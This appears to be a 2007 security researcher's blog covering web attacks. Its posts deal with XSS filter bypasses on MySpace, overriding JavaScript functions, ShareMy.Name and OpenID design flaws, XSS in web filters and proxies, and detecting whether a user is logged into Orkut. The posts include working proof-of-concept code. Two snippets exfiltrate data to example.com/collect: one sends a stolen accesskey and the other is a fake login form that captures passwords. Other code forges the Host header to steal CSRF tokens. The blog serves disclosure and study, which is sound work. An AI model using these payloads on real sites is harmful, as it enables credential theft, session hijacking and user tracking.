Tuesday, January 30, 2007

MySpace doesn't understand browsers (RCSR info)

You know what I hate? Advisories without enough info to verify a bug, and no PoC code. For example, http://www.info-svc.com/news/01-29-2007/myspace/ provides no information about the nature of the issue; it just says there is one, and of course once they do disclose something there will be no proof that they actually found it in the first place. More than that, I honestly don't care about people declaring that they've found security issues without giving specifics.

Anyway, I thought I'd go have a look myself, and here is a little snippet which works in both IE and Firefox:

<input type_="password" type=`password`>

Whether this is what Chapin Information Services found is unclear, since they didn't release anything, but what is clear is that MySpace doesn't understand that the Non-Digit-Non-Alpha issue extends to all attributes, nor do they seem to understand that IE also allows grave accents (`) to be used instead of (single or double) quotes.

I really don't understand how many times they need to fix these issues before they begin to understand them.

Friday, January 26, 2007

A Month In Obscurity

Firstly, sorry about the lack of content over the last few days; I've been busy with yet another new paper/project, and life in general, so I haven't had a chance to write up my research and post it. I don't see myself having much time to write something up this weekend either, but come Monday or Tuesday I'll most likely start posting again.

But in the meantime, I thought I'd post some interesting but rather obscure things I've found on the internet. "Obscure" here means not mentioned on ha.ckers, so a lot of people might know a lot of these, but I think most people won't know all of them. Oh, and this isn't strictly content from January (it primarily is), but anything interesting I found lately and thought most people wouldn't know about is link-worthy. If you know of anything else, please write a comment or something.

.NET Framework bug and XSS by xknown.

Essentially, xknown found that when .NET pages use Response.Redirect, the function does not check whether the URL provided is one that can actually be used in a Location header, so it is possible to send a javascript: URI; the page will attempt to redirect you to it, fail, and then print it out on the page like so:

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="javascript:alert('XSS')">here</a>.</h2>
</body></html>


And if the user clicks on the link, they will execute your JS. Of course data: and similar URIs can also be used.
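
As a quick illustration of how the payload gets there (the page name and query parameter below are made up; any parameter the application feeds straight into Response.Redirect would do), it can simply be delivered as a link to the vulnerable page:

<!-- Hypothetical example: 'ReturnUrl' stands in for whatever parameter the
     vulnerable page passes to Response.Redirect unchecked. -->
<a href="http://victim.example/login.aspx?ReturnUrl=javascript:alert('XSS')">
    harmless-looking link
</a>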

Anti-DNS Socket Pinning + Flash by Kanatoko.

With Anti-DNS Pinning, we can break the same-origin policy.
Not only JavaScript, but also FLASH and Java Applet are affected.

FLASH has the Socket class in the new version of FLASH Player ( version 9.0 or higher, ActionScript 3.0 ).

--Quoted from the documentation--
The Socket class enables ActionScript code to make socket connections and to read and write raw binary data.
The Socket class is useful for working with servers that use binary protocols.
----


Month of Apple Fixes by Landon Fuller.

I think the title is pretty self-explanatory here, and while I didn't think this was really worth a mention, I thought I might as well chuck it in, since not everyone keeps on top of these things.

Cross-Domain POST Redirection by Ilia Alshanetsky.

Not exactly new research, but something most people don't know about. I wonder if phishers will start using this instead of the MITM phishing kits which generated so much pointless publicity.

Digg This - Blog Security Vulnerabilities Found by Harry Maugans.

Harry found a bug in the Digg This WordPress plugin: it blindly assumed that the first hit to come to a page from Digg must be coming from the link in the submitted story, so a spammer can easily get people to digg their own articles instead of the articles posted on a blog. Great find by Harry, and great ingenuity by the spammers IMO.

Uninformed Issue 6 Was Released

Uninformed is a technical outlet for research in areas pertaining to security technologies, reverse engineering, and lowlevel programming. The goal, as the name implies, is to act as a medium for informing the uninformed. The research presented here is simply an example of the evolutionary thought that affects all academic and professional disciplines.


Its articles are of impeccable quality, so I say everyone with even a cursory interest in low-level programming or similar should check it out.

Tricking forums about image size (Animated GIFs) Analysis by Captbox, image example supplied by Xoferif.

What Captbox was able to work out from the image Xoferif provided is that while GIF images do have global size data, in animated GIFs that size data is ignored in favour of per-frame size data, and since most (probably all) forums only check the global size data, we are able to supply images of any size no matter what restrictions are placed on us.
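
To make the distinction concrete, here's a little sketch of where the global size actually lives, given the raw bytes of a GIF (however you obtained them); the per-frame image descriptors that renderers honour in animated GIFs are separate structures with their own width and height fields:

// Sketch: the global size sits in the logical screen descriptor right after
// the 6-byte "GIF87a"/"GIF89a" header; this is the value forum checks read.
function gifGlobalSize (bytes) { // bytes: array of byte values
    var signature = String.fromCharCode(bytes[0], bytes[1], bytes[2]);
    if (signature !== 'GIF') {
        throw new Error('not a GIF');
    }
    // width and height are 16-bit little-endian values at offsets 6 and 8
    var width  = bytes[6] | (bytes[7] << 8);
    var height = bytes[8] | (bytes[9] << 8);
    return { width: width, height: height };
}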

New SQL Truncation Attacks And How To Avoid Them by Bala Neerumalla.

This one is a bit hard to explain, so I say you should just go read the article; it'll definitely be worth your time.

MySpace's "Domain Generalisation" Vulnerability by trev.

trev found a way to exploit MySpace's domain generalisation (which exists so that all the MySpace subdomains can interact via JavaScript), using the fact that the domain names we enter are not full names but only partial names, because full names end in a dot, signalling that the .com address is a subsidiary of the root address rather than of some other address. Anyway, it's an interesting thread - you should read it.
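
For anyone unfamiliar with the term, this is roughly what "domain generalisation" refers to - a generic illustration of document.domain, not trev's actual exploit:

// Run on pages of, say, profile.myspace.com and home.myspace.com alike, this
// relaxes each page's origin to the shared parent domain...
document.domain = 'myspace.com';

// ...after which frames and windows from either subdomain are allowed to
// script each other's DOM.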

Fake AP by Black Alchemy.

This is a fairly old project which I only found out about a week ago, and while it's not revolutionary or anything, I thought it was interesting enough to tell people about. It also showcases the huge difference between web and network security (try to come up with a situation in web security where hiding in misinformation/plain sight was ever possible - if you think of something, email me).

And those are the interesting links I've found in the last month which the other blogs I linked to haven't (to my knowledge) covered.

Wednesday, January 24, 2007

defy.js

Well, I was kinda bored this morning and had the (very questionable) great idea of writing a snippet of code to delete all JavaScript overloading and reinstate the XMLHttpRequest object:

// Grab a clean XMLHttpRequest constructor from a freshly created iframe.
function extractXHR () {
    var iframe = document.createElement('iframe');
    iframe.name = 'test';
    iframe.src = 'http://www.google.com/';
    iframe.style.display = 'none';
    document.body.appendChild(iframe);
    window.XMLHttpRequest = window.frames.test.XMLHttpRequest;
    document.body.removeChild(iframe);
}

// Walk an object's enumerable properties and try to delete any overloaded
// copies that have been stuck onto window.
function recursive_delete (object) {
    var failed;
    for (var obj in object) {
        failed = 0;

        try {
            delete window[obj];
        } catch (e) {
            failed = 1;
        }

        // only recurse if the delete didn't throw
        if (failed == 0) {
            try {
                recursive_delete(window[obj]);
            } catch (e) {
                // not every property is something we can walk; ignore it
            }
        }
    }
}

recursive_delete (window);
recursive_delete (document);
extractXHR();


The other thing I could have done would be a recursive_extract function, which tried to extract everything from the window object of the iframe, but not everything is enumerable (e.g. XMLHttpRequest is not enumerable), so customized code could still possibly be needed.
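
For what it's worth, here's a shallow sketch of that idea (as noted, property names that aren't enumerable, like XMLHttpRequest, would still have to be copied across explicitly, as extractXHR does):

// Copy every enumerable property from a clean window (e.g. the iframe's)
// onto the overloaded one; non-enumerable and read-only properties are
// simply skipped.
function extract_properties (clean, dirty) {
    for (var name in clean) {
        try {
            dirty[name] = clean[name];
        } catch (e) {
            // some host properties throw on assignment; ignore them
        }
    }
}

// usage: extract_properties(window.frames.test, window);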

Also, the reason the extraction works is that it executes before the page has fully loaded, so the originating domain policy hasn't kicked in yet and we can still get at the iframe's window object. It's probably not the same object as the one the page uses in the end though; I think I might check that out.

Essentially what that means for an attacker is that there is a tiny chance it won't work, if the page gets set up between the two JavaScript instructions which append the iframe and extract the XMLHttpRequest object.

Tuesday, January 23, 2007

More Javascript Overloading

Well, as I mentioned in my last post, Jeremiah's idea of masking functions works quite well, but I left out the fact that it only works for the window object, so things like document.write() are still safe because document itself cannot be masked. Try it:

javascript:function document() {};

And you get the error Error: redeclaration of const document.

As you can see, while I do call it masking when you override XMLHttpRequest by creating a function of the same name, it is really just redeclaring it inside the window context.

So it's effectively impossible to stop people writing to the document, and therefore creating an iframe and using its XMLHttpRequest object.

Now, thanks to Mook from irc.mozilla.org #js, I've also found out that for everything other than XMLHttpRequest that you can overwrite, there also seems to be a property in window.__proto__ that does the same thing. Conveniently enough, you can also create a function called __proto__ which blocks it.

Also, just an assorted JavaScript note related to my previous articles that I want to mention:

When the submit() method gets replaced by a form element of the same name, you can still access it via form.__proto__.submit(); again, thanks Mook.
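
A quick sketch of what that looks like (the form and field names are made up, and __proto__ is the Mozilla-specific property discussed above):

<form name="f" action="http://example.com/">
<!-- this input shadows the form's native submit() method -->
<input type="text" name="submit">
</form>

<script>
var form = document.forms['f'];
// form.submit is now the <input> element, not a function...
// ...but the real method is still reachable on the form's prototype:
form.__proto__.submit.call(form);
</script>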

Redeclaring Javascript Properties

Ok, so the title of this was originally "Don't we have memories for a reason?", and had a bit of a rant here, but I decided the rant part was a bit unwarranted and stupid (exceptionally stupid, really), so I've removed it so I don't subject anyone else to that crap. Anyway, on with the post:

Jeremiah Grossman (who does some great work, actually) had the idea of stopping XSS worms by denying them access to some crucial functions like XMLHttpRequest() and createElement(). You can read the whole post here: http://jeremiahgrossman.blogspot.com/2007/01/preventing-csrf-when-vulnerable-to-xss.html.

Now, while I don't think people have attempted to do exactly that before, there were efforts a while back to do the same thing to deny attackers access to cookies, using the same techniques, and it turned out those could be easily subverted. Now, this isn't my rant; things happen and people might not know about what has happened before, fair enough.

But when people who know what happened before, and know that these things can be overwritten, start saying that Jeremiah's idea works, you've really got to wonder why we have memories if we don't use them.

Oh, and here's some code to prove my point (check your error console to see that there are no errors and that the appropriate functions are being called):

javascript:window.__defineGetter__("open", function() { }); delete window.open; window.open("http://kuza55.blogspot.com/",null,"");

javascript:document.createElement = function () {}; delete document.createElement; var bold = document.createElement('b'); bold.innerHTML = 'createElement Works'; document.body.appendChild(bold);

javascript:document.__defineGetter__("write", function() { }); delete document.write; document.write('document.write works');

I also found it humorous that someone was recommending using delete to remove the function from the window object, instead of overwriting it, so that people could not call it.

Ok, now onto some more interesting things. The idea Jeremiah proposed for getting rid of the XMLHttpRequest() object was quite a good one, because whenever we try to delete a function it doesn't work; we CANNOT delete functions, it seems you can only delete objects and properties.

The documentation for the delete operator can be found here; it doesn't mention why we can't (or how to) delete functions though: http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Guide:Operators:Special_Operators#delete

So essentially that definitely works, so good job on coming up with that. Well, until someone else figures out a way past that as well.

But there are some fun things you can do like the following:

<html>
<body>

<script>
function XMLHttpRequest() { }
</script>

<iframe name='test' id='test' src='http://www.google.com/'></iframe>

<script>
var req = new window.frames.test.XMLHttpRequest();
alert(req);
</script>

</body>
</html>


So if we can somehow create an iframe with a name, we can circumvent it. We could also use an iframe created by advertising code, but that is limited by the fact that we would need to use window.frames, and the only things you can't replace with functions are window, document, and possibly some other constants I can't remember right now.

Disclaimer: I'm not saying that anyone I've mentioned does bad work (and even when I was ranting, I wasn't saying that), but seriously: if you were told about something once, do you need to be told again?

Monday, January 22, 2007

Picking Brains With...Me; Brains Are Tasty

Well, Jungsonn today started a series of "interviews with hackers, admins, programmers and other people from the security field. They are given a set of questions to answer." entitled "Picking Brains With...", and it seems I've been his first target, so if anyone is interested, you can find it here: http://www.jungsonnstudios.com/blog/?i=76&bin=1001100

And while I obviously don't find it all that interesting reading things I wrote about myself, I'm definitely quite eager to see who else he convinces to answer his questions, and their responses.

Oh, and like I said; I'd really like to hear from anyone who wants to be a "hacker". I really want to know why you want to be a "hacker". What's so special about the word hacker that lures you?

ShareMy.Name Design Issues

I've just posted a little article about some things that I think are currently wrong with OpenID implementations, so I thought it would be only fair to give the same treatment to ShareMy.Name - which admittedly isn't an SSO (Single Sign On) service, but it does provide a facility for easily giving out your data to everyone.

First of all though, I'll give you some history of what I've personally seen. ShareMy.Name seems to have gone through several different phases. At first it simply acted as a username/password and personal-details depository so that other sites didn't have to; you would provide the same username and password to all sites, and a malicious (or hacked) site could get all your details. Then came a phase where you needed to enter a regenerating accesskey (sort of like those two-factor ID tokens). In the current state you get an accesskey assigned to you when you sign up and send that key (supposedly) to ShareMy.Name, where, if the accesskey matches an account, it asks you whether you want to send back the data the site has asked for.

You can see a demo here: http://sharemy.name/test_sendback/

They also give you a Javascript Bookmarklet which looks something like this:
javascript:document.cookie='accesskey=aNwluiUMqk;path=/';
function r(){
document.forms['sharemyname'].accesskey.value='aNwluiUMqk';
document.forms['sharemyname'].action='http://sharemy.name/sendback/';
document.forms['sharemyname'].submit();
}
if(document.forms['sharemyname']) r(); else alert('We tried everything, your going to have to enter aNwluiUMqk manually; or, they do not support ShareMy.Name.');


This tries to send the request to ShareMy.Name so that you can verify whether or not you want to send certain details to the site.

For the moment, let's ignore the fact that you could just ask the user to input their accesskey in a form and they would readily do it, or the fact that every site gets sent the accesskey, and assume that the bookmarklet is the only way to get the data and that the accesskey is not sent back.

They give us the accesskey (when they set the cookie) regardless of whether the user agrees to give it to us on the sharemy.name page.
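
To illustrate why that matters (the polling approach and the collection URL here are mine, purely for illustration), a hostile page that gets the user to click the bookmarklet only has to read the cookie the bookmarklet just set on it:

// The bookmarklet writes accesskey=... into document.cookie of whatever page
// it is run on, so that page's own scripts can simply harvest it.
setInterval(function () {
    var match = document.cookie.match(/(?:^|;\s*)accesskey=([^;]+)/);
    if (match) {
        // ship the key off to a server the page's owner controls (made-up URL)
        new Image().src = 'http://example.com/collect?key=' +
                          encodeURIComponent(match[1]);
    }
}, 500);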

But ignoring the fact that we are given the accesskey up front (this is an easy fix with no real ramifications - what is harder to fix is people overloading and subverting the page in such a way that the bookmarklet fails in its job), and the fact that users are encouraged to enter their accesskeys into unknown forms ('We tried everything, your going to have to enter aNwluiUMqk manually; or, they do not support ShareMy.Name.'), there is still the problem that the site is sent the accesskey by default.

This is a problem because when the user gives, say, their first name, interests and accesskey, they are essentially giving the site all of their information, because no identification other than the accesskey is required to get information about the person.

And even more than that, since the key is permanent (from what I've seen), they have access to your data indefinitely.

Now, I realise that this could all be fixed simply by requiring the user to be logged into their account when agreeing to share details, but I think without an exposé of the ramifications of their current design, nothing will change. And it's fun to write about the havoc one can wreak.

I won, I won, I won.....

I won a book! Yesterday I remembered the contests Sploitcast runs, went and had a look at the one they'd released last Friday, and to my surprise found that the one released on the day I'd gone canoeing hadn't been solved. A couple of hours later I solved the challenge (by finding a copy of purchase_report.txt), and it seems I was the first: http://www.sploitcast.com/ (scroll down to the News section). So now I get a free Syngress Publishing book.

I chose to get RFID Security by Frank Thornton, Brad Haines and John Kleinschmidt, which should be interesting once it gets shipped out to me.

If anyone is bored, I suggest they go try out the challenge (even though you won't win anything); it's an interesting one.

Oh, and if anyone is subscribed to the RSS feed (I think there are a very small few) and you don't want to read about crap like this, just subscribe to the "Security (All)" feed, which won't contain anything other than security articles.

Sunday, January 21, 2007

Insecure OpenID 'Features'

Note: I wrote this a while ago, and I haven't gone over it completely, but I thought it would be worth posting about.

I read about OpenID a while ago, when a friend asked me what I thought of it from a security perspective, and from what I could tell from the documentation, except for DNS issues it wasn't a bad decentralised authentication protocol. I didn't do any further research into it until I came across a blog entry describing how it works in practice (http://www.readwriteweb.com/archives/openid_vs_bigco.php).

In that article/Flash 'demo' I saw that, as with any protocol, developers can come up with great 'features' which damage the security of the protocol. And this isn't one OpenID provider deciding to add an insecure feature, either; it is common to all 3 of the OpenID providers mentioned in the article, which I assume are the most popular ones in use (why else would a blogger mention them?).

Now, what is this feature I feel should not exist? It is the ability to set a site to be able to accept your credentials without you having to enter your OpenID password, and since your OpenID provider does not pass these details on to the site, the site has no way of telling that no password was ever entered.

Of course, you still need to be logged into your OpenID provider, but since you're meant to be using this login for several sites, it's not too much of a stretch to believe that you're going to be logged in the whole time you're online - which is quite a large window. And if we consider that most sites will these days tell other users when a person is online, or let you reveal that fact yourself via posting comments, photos, etc., finding such a window is not too difficult.

But enough about the feature itself; what does it mean to us? It means that an attacker can log you into any site you decided to trust via CSRF attacks, because the site cannot tell whether you entered a password. This might not seem important, but it matters for both large-scale and targeted attacks, because the user no longer needs to be logged into the service you want to attack, merely into the central service.
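
A rough sketch of what such a CSRF could look like (the relying party's endpoint, the field name and the victim's identifier are all made up - real sites differ):

<!-- If the victim's provider has been told to "always allow" this relying
     party, this logs the victim in with no password prompt at all. -->
<form id="csrf" method="POST" action="http://relyingparty.example.com/login">
<input type="hidden" name="openid_url" value="http://victim.myopenid.com/">
</form>
<script>
document.getElementById('csrf').submit();
</script>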

Even worse, this fact is completely misrepresented to users. The questions that are posed essentially revolve around whether you trust the site that wants to verify your identity, and whether your OpenID provider should always verify your identity to this source. So even if a user is generally cautious about these kinds of things, if something like an email provider started using this, the user would be more likely to trust the site, and so cause security issues. Essentially, the more critical the information you are accessing, the more likely you are to trust the site you are trying to access, so the more critical sites are the ones which will have issues with this. Let's just hope they don't use OpenID though, because leaving DNS security essentially up to your users is about the worst idea anyone could come up with, but that's another rant altogether.

For reference, the 3 OpenID providers I tested were:

http://www.myopenid.com/ where users are asked if they want to allow the site they want to log into to be able to verify their identity, and the insecure answer is "Allow Forever"

http://www.claimid.com/ where users are asked if they want to log into a site, and the insecure answer is "Login and Trust"

http://www.videntity.org/ where users are asked if they trust the remote site with their identity, and the insecure answer is "Yes, and don't ask me Again"

Another insecure 'feature' is that there is no need to enter a password to register for a site. Of those 3 OpenID providers, only http://www.claimid.com/ asked users for a password when registering for a site; the other two had only CSRF protections. This is admittedly not particularly serious, because you still need an XSS (or similar) flaw in the OpenID provider's site before you can take advantage of the design, but it is rather worrying that people designing secure systems don't seem to want to implement defence in depth.

Detecting Javascript .focus() in iframes to Detect Logged In Status (IE only)

I've been playing around with a lot of ways to detect whether users are logged in, but I haven't published many of them, so here's yet another one.

One thing many sites (google sites in this example) do is use the Object.focus() method to set the focus to a login form.

And in IE, if the object being focused is in an iframe, the iframe also gains focus, which is an event we can easily detect. So if we have an iframe which there is no way the user could have focused themselves, and it gains focus, that tells us the content of the iframe set the focus to something, and the user is therefore not logged in. If, a few seconds after it has loaded, it has not gained focus, we can very safely assume it didn't try to, and the user is therefore logged in.

Here's a quick PoC for Orkut:

<html>
<body>
<script>
var logged = true;
function check () {
    if (logged == true) {
        alert('You ARE logged into orkut');
    }
}
</script>
<iframe src="https://www.orkut.com/News.aspx" onFocus="if (logged == true) { alert('You are NOT logged into Orkut.'); logged = false;}" onLoad="window.setTimeout ('check()', 1000);" width=0 height=0></iframe>
</body>
</html>

On Stefan Esser's CSRF Protection Idea

A while ago I read a post entitled "CSRF protections are not doomed by XSS" by Stefan Esser, which proposed an interesting method of using domain boundaries to stop an XSS hole in the main domain from being used to extract form tokens and circumvent CSRF protections; it would even go so far as stopping an XSS vuln in one form from circumventing the CSRF protections of another.

And even if it is more difficult to implement than simple token protections, it is still feasible if you use a wildcard DNS entry and have a check on each form which verifies that $_SERVER['HTTP_HOST'] is the expected host, redirecting to the right one if not.

And I was even going to implement an example, until I realised one simple flaw: it's all still hosted on the same server, and the only thing separating the forms is the HTTP Host header, which can easily be forged via XMLHttpRequest or FlashRequest, so this protection can easily be beaten.
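
For example, an XSS payload running on the main domain could do something along these lines (the URLs and hostnames are illustrative, and this assumes the browser's XMLHttpRequest lets you set the Host header, which is what the whole point relies on):

var xhr = new XMLHttpRequest();
// request the form from the real server...
xhr.open('GET', 'http://www.example.com/transfer_form.php', false);
// ...but claim to be the subdomain the form checks for
xhr.setRequestHeader('Host', 'transfer-form.example.com');
xhr.send(null);
// the response now contains the token the CSRF protection relies on
var token = xhr.responseText;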

Which got me thinking: what would you need to add for it to work as intended? Well, you could put all the forms on separate servers, but that doesn't seem at all practical; the only really viable solution is to add more authentication mechanisms which are readable only by the specific subdomain and no others.

And that's really the biggest issue - you have to create an extra session key for every single form you have on your site, and set a cookie for each of them, and they all have to be set at login and can never be regenerated, because XMLHttpRequest and (possibly) FlashRequest can read response headers and extract the cookies being set on subdomains.

So while it is still of course possible to implement this, it seems completely impractical to create yet another session id which the server has to keep track of for every single form.

But if anyone has actually implemented something similar to this in any environment I'd really love to hear about it.

Saturday, January 20, 2007

XSS-ing Web Middleware

A while ago I stumbled upon some XSS vulnerabilities in some web filtering software (namely Websense and Surfwall), and it got me thinking that these applications, along with other web middleware, could be as damaging (if not more so) to the end user, since an XSS hole in the middleware would affect all sites used through the middleware.

What is Middleware?



But what kind of middleware exists on the web? Right now I can only think of two different types: web filters and web proxies. Let's have a quick think about how these two pieces of software differ from an attacker's point of view.

With a web filter, the software effectively exists on every single domain which has 'objectionable' content, so when we XSS it through a web filter, we are still attacking the original domain.

Web proxies, on the other hand, are very different, because a web proxy exists only on its own domain, but everything goes through it. So while most web proxies store the cookies on their server (meaning a direct XSS attack will not yield authentication cookies for other sites), if you can steal the web proxy's cookies, you are essentially logged in everywhere the user is. Sadly you don't know where that is, and you need to find out.

XSS-ing Web Filters


Firstly, let's assume we've found an XSS flaw in some filtering software; from what I've seen (http://www.jungsonnstudios.com/blog/?i=28&bin=11100 ; http://sla.ckers.org/forum/read.php?3,44,4640#msg-4640) it's not too big an assumption.

The next question is what conditions we need to meet for an attack to work. Well, obviously we need the web filter to become active on the site (in the sense that it does block pages from that site), but most importantly of all we need the web filter to display its error messages on the domains it is blocking, rather than on a central domain.

Another useful (but not essential) condition is to have the site only partially blocked, so that the user can already be logged into the domain you want to attack.

Essentially this means that content-based web filters (e.g. ones which search for meta tags, titles, keywords, etc.) are better targets than those which block sites on a per-domain blocklist basis, because domains that are completely blocked won't have users logged into them, so attacks against them need to be completely different.

Why? Because if a whole domain is blocked, then an XSS hole in the block page won't let you steal login credentials, because the user isn't logged in there. On the other hand, if a domain isn't blocked in a blocklist, then we can't execute an attack at all. But if a domain isn't blocked by a content-based web filter, it may still be possible to get it blocked by injecting restricted keywords into a page - so even if a page is not normally blocked, you can inject some keywords into a search string and have the filter block that page.

The one thing I have been able to come up with, though, is simply replacing the whole page that is blocked. Let's say www.sharetrading.com is blocked because a company doesn't want its employees using work time to check on their shares, the whole domain is blocked, and you have an XSS hole in the blocking page. From there you can easily inject some JavaScript which overwrites the "page blocked" message, replaces it with what the user expects, and simply collects login details.
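
Something along these lines would do it (everything here - the markup and the collection URL - is illustrative):

// Injected via the XSS hole in the filter's block page: throw away the
// "page blocked" message and show a fake login page instead.
document.open();
document.write(
    '<h1>www.sharetrading.com - please sign in</h1>' +
    '<form method="POST" action="http://example.com/collect">' +
    'Username: <input name="user"><br>' +
    'Password: <input name="pass" type="password"><br>' +
    '<input type="submit" value="Log in">' +
    '</form>'
);
document.close();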

Sadly though, both of the vulnerabilities that Luny and Jungsonn found live on a central server. So while there are currently no vulnerabilities that I know of which satisfy these conditions, it is important to keep in mind that every layer you add which can possibly add content is vulnerable.

XSS-ing Web Proxies


Like I mentioned above, web proxies are really the polar opposite of web filters, because they exist on one domain showing content from all domains, rather than showing the 'same' content on all domains. But these are a dime a dozen, and vulnerabilities should exist by the bucket load.

And they do, because they have an enormous task set for them: they must not only remove all JavaScript, but keep content as intact as possible, so they often go as far as allowing JavaScript and trying to rewrite it so that it's safe. There's really no way of locking these down without destroying so much functionality it's not funny; it's like surfing without JavaScript, except with some potential holes around the edges.

For the ones which try to remove JavaScript completely - well, it's just another XSS filter, it shouldn't be much of an issue to defeat.

For the ones which try to rewrite it, there is some really interesting stuff I want to talk about. The example I'll be talking about is http://the-cloak.com/. It has the added feature that it rewrites JavaScript so that it executes almost as if it were on the actual domain; to do this it replaces all instances of document.cookie and similar properties with TC_document_cookie and the like, which contain the values from the site which the-cloak.com is proxying. It is of course trivial to break past this by using some simple JavaScript tricks like this:

var test = document;
alert(test.cookie);


But even more interesting is the realisation that there is (of course) no same-origin policy in force here, so you have unrestricted access to all the cookies for every domain: you can just use an iframe to load the proxied domain you want to attack, and then simply read the TC_document_cookie variable out of the iframe.
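
In sketch form it looks something like this (the proxied URL format is made up - it would need to match whatever the-cloak.com actually uses - and TC_document_cookie is the rewritten name described above):

// From one page already being served through the proxy, load another proxied
// site in an iframe; both frames live on the proxy's domain, so the
// same-origin policy doesn't stop us reading the rewritten cookie variable.
var frame = document.createElement('iframe');
frame.name = 'target';
frame.src = '/proxied?url=http%3A%2F%2Fwww.example.com%2F'; // made-up format
frame.onload = function () {
    alert(window.frames['target'].TC_document_cookie);
};
document.body.appendChild(frame);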

For the proxies that don't spit the cookies out anywhere: keep in mind that all XSS attacks are nothing more than a means to an end, and being able to steal the cookies for the web proxy itself is just as useful.

Conclusion


As we can see, XSS is something that may end up concerning more people than just web app developers; anyone who develops apps which interact with the web will have to make sure that their products don't add extra vulnerabilities to a user's setup.

Ok, so I haven't really said anything groundbreaking, but it's something that wasn't being said anywhere else that I could see, so I thought I'd write about it, even if it is partially theoretical.

Also, if anyone can think of any more middleware which exists on the net: please write a comment, send me an e-mail, or get in touch some other way. I'd love to hear about more things which can potentially make the web a more dangerous place. In fact I'm willing to hear about any applications which somehow influence what the browser renders, no matter where they are.

More content coming soon

I've just gotten back from an 8 day canoeing trip with some friends, where I realised that I have so many ideas, PoCs, papers and similar things which are just lying around and not being discussed or published by anyone else. So, in a rare attempt at conscientiousness, I'm going to try to publish at least one article a day for the next week - hopefully it'll work and I won't give up too soon. So look forward to seeing some new (and hopefully interesting) content soon.

Monday, January 01, 2007

More Logged In User Detection via Authenticated Redirects

Ok, so what's changed since the 30th, when I posted about this under a different name (Semi-Open Redirects)? Well, I thought of a better name and some new ways to exploit authenticated redirects.

Authenticated redirects should be self-explanatory, but essentially I just mean redirects which don't redirect you if you aren't logged in (or ones which redirect you only if you aren't logged in - either way, it's a good enough name for me).

Now, in my post about Semi-Open redirects, one of the constraints I hadn't thought of a circumvention for was the need to have an open redirect, so you could control where it redirects.

Since then I've realised that it's not always necessary to control where the redirect sends users, because we can already check whether a user has visited a page through the CSS history hack!

Some common types of authenticated redirects which you can find on the internet are download pages which you need to login to view, which use redirects to track how many people are getting sent to each download or other link.

But anyway, these redirects are abundant, so here's the source to a working PoC for Orkut:
<html>
<body>
<script type="text/javascript">
    function iframe_callback() {
        if(temp.offsetHeight==1){
            alert('You are NOT logged into Orkut.');
        } else {
            alert('You ARE logged into Orkut.');
        }
        c.removeChild (temp);
        document.body.removeChild(orkut_iframe);
    }

    document.write( '<style type="text/css">#nicked a:link{color:#fff;}' );
    document.write( '#nicked a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}' );
    document.write( '#nicked{font-size:1px;overflow:hidden;height:1px;margin:0;padding:0;}</style>' );
    var c = document.createElement('div');
    c.id='nicked';
    document.body.appendChild(c);
    
    var visited = true;
    var temp = document.createElement('a');
    temp.innerHTML = 'test';
    c.appendChild(temp);
    var random, link;
    
    while (visited == true) {
    
        random=Math.floor(Math.random()*1000000);
        link = 'https://www.orkut.com/GLogin.aspx?done=https%3A%2F%2Fwww.orkut.com%2FNews.aspx%3Ftest%3D' + random;
    
        temp.href=link;
        if(temp.offsetHeight!=1){
            visited = false;
        }
    }
        
    var orkut_iframe = document.createElement('iframe');
    orkut_iframe.src = 'https://www.orkut.com/News.aspx?test=' + random;
    orkut_iframe.style.display = 'none';
    orkut_iframe.onload = iframe_callback;
    document.body.appendChild(orkut_iframe);
    
</script>
</body>
</html>


Note: This PoC works on the principle that Orkut redirects you to a login page which has the URL you wanted to go to embedded in it, so we create a URL with a random number appended and then check (via the CSS history hack) whether you were redirected to the corresponding login URL.

Oh, and credit to Christian Heilmann whose CSS detecting code I essentially stole, because he was the first one smart enough to get it working in all browsers and post the working version in a comment on Jeremiah's blog. If anyone is interested I ripped the code from here: http://icant.co.uk/sandbox/nickhistory.html